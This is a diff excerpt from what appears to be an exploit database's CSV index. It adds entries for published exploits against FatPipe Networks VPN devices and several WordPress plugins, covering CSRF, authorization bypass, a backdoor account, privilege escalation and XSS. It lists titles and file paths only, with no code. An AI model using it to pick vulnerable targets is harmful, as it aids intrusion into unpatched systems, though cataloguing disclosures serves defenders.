 50329,exploits/php/webapps/50329.txt,"Pharmacy Point of Sale System 1.0 - SQLi Authentication BYpass",1970-01-01,"Janik Wehrli",webapps,php,
 50333,exploits/php/webapps/50333.txt,"WordPress Plugin Wappointment 2.2.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Renos Nikolaou",webapps,php,
 50334,exploits/php/webapps/50334.txt,"Library System 1.0 - 'student_id' SQL injection (Authenticated)",1970-01-01,"Vinay Bhuria",webapps,php,
+50338,exploits/hardware/webapps/50338.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,webapps,hardware,
+50339,exploits/hardware/webapps/50339.txt,"FatPipe Networks WARP 10.2.2 - Authorization Bypass",1970-01-01,LiquidWorm,webapps,hardware,
+50340,exploits/hardware/webapps/50340.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
+50341,exploits/hardware/webapps/50341.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)",1970-01-01,LiquidWorm,webapps,hardware,
+50342,exploits/hardware/webapps/50342.py,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation",1970-01-01,LiquidWorm,webapps,hardware,
+50343,exploits/php/webapps/50343.txt,"WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Nosa Shandy",webapps,php,
+50344,exploits/php/webapps/50344.txt,"WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
+50345,exploits/php/webapps/50345.txt,"WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
+50346,exploits/php/webapps/50346.txt,"WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,